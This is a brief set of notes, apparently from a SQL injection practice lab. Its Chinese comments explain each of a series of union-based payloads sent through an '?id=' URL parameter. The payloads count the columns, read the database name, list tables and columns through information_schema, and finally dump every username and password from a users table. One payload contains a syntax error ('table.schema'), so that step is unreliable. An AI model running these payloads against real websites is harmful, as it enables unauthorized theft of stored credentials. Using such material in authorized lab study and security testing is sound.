?id=1
?id=99'union select 1,2,3--+
查看占位
?id=1' order by 3--+
尝试出表有几列
?id=1' order by 4--+
说明只有三列
?id=99' union select 1,database(),3--+
查询当前使用的数据库的名称
?id=99' union select 1,group_concat(table_name),3 from information_schema.tables where table.schema='security'--+
查询security表中有哪些表
?id=99' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+
查询users表中有哪些信息
?id=99' union select 1,group_concat(concat_ws(';',username,password)),3 from security.users--+
展示所有users表中的信息
